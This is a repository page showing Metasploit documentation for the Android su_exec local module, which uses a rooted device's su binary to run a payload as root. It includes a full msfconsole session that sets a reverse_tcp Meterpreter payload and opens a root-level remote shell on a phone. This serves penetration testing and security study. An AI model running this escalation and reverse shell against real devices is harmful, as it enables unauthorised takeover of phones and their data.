adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
5ad5384b7fc5ac403ea8dfdb4921f032e349de13
metasploit-gs/documentation/modules/exploit/android/local/su_exec.md
T
cgranleese-r7 adff497bd2 Updates msf5 as well
2025-07-17 11:51:29 +01:00

56 lines
2.6 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module uses the su binary present on rooted devices to run a payload as root.
A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root.
This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a
temporary directory, make it executable, execute it in the background, and finally delete the executable.
On most devices the su binary will pop-up a prompt on the device asking the user for permission.
This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data.
Many devices can be rooted by flashing new firmware, however the existing data will be lost.
## Scenarios
You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md)
Once the module is loaded, one simply needs to set the `SESSION` option and configure the handler.
An example session follows:
```
msf exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter dalvik/android u0_a80 @ localhost 192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)
msf exploit(multi/handler) > use exploit/android/local/su_exec
msf exploit(android/local/su_exec) > set SESSION 1
SESSION => 1
msf exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
payload => linux/aarch64/meterpreter/reverse_tcp
msf exploit(android/local/su_exec) > set LHOST 192.168.0.176
LHOST => 192.168.0.176
msf exploit(android/local/su_exec) > set LPORT 4445
LPORT => 4445
msf exploit(android/local/su_exec) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.0.176:4445
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (818780 bytes) to 192.168.0.107
[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800
[-] Exploit failed: Rex::TimeoutError Operation timed out.
[*] Exploit completed, but no session was created.
```
Please not that in most cases you will have to manually confirm the Superuser prompt
on the device itself before the module completes. You can do `set WfsDelay 10` to
give yourself more time.
Reference in New Issue View Git Blame Copy Permalink